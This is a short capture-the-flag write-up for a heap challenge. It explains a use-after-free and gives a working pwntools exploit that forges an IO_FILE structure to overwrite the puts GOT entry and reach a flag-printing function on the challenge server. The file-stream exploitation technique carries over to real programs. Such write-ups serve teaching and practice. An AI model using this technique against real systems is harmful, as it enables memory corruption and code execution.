When creating temporary name, our initial object will get freed, thus letting malloc to give this chunk for `IO_FILE` struct allocation caused by `fopen()`. Basically UAF.

PoC below overwrites GOT entry of puts to function that cats the flag.
We are getting arbitrary write primitive by modifying BUF_BASE & BUF_END objects, so they would point to puts GOT entry.

```
import base64
from pwn import *

distance_to_fd = 0x70
win_func = 0x00000000004008a7
puts_got = 0x00601020

fake_struct = ""
fake_struct += p32(0xFBAD2088) # FLAG &~_IO_NO_READS
fake_struct += p32(0)
fake_struct += p64(0) # READ_PTR
fake_struct += p64(0) # READ_END
fake_struct += p64(0) # READ_BASE
fake_struct += p64(0) # WRITE_BASE
fake_struct += p64(0) # WRITE_PTR
fake_struct += p64(0) # WRITE_END
fake_struct += p64(puts_got) # BUF_BASE
fake_struct += p64(puts_got+0x142) # BUF_END
fake_struct += p64(0) # save_base
fake_struct += p64(0) # backup_base
fake_struct += p64(0) # save_end
fake_struct += p64(0) # markers
fake_struct += p64(0) # chain
fake_struct += p64(0x0) * ((distance_to_fd - len(fake_struct))/8) # fill with garbage --
fake_struct += p64(0) # FD_NO = STDIN

r = remote("chal1.swampctf.com", 2050)
r.recvuntil("?")

r.sendline("1")
r.sendline("DEADBEEF")
r.recvuntil("new name")
r.sendline(fake_struct)
r.recvuntil("void!!")
r.sendline(p64(win_func))
r.interactive()

```

References: [here](https://dangokyo.me/2018/01/01/advanced-heap-exploitation-file-stream-oriented-programming/) and [here](https://www.slideshare.net/AngelBoy1/play-with-file-structure-yet-another-binary-exploit-technique)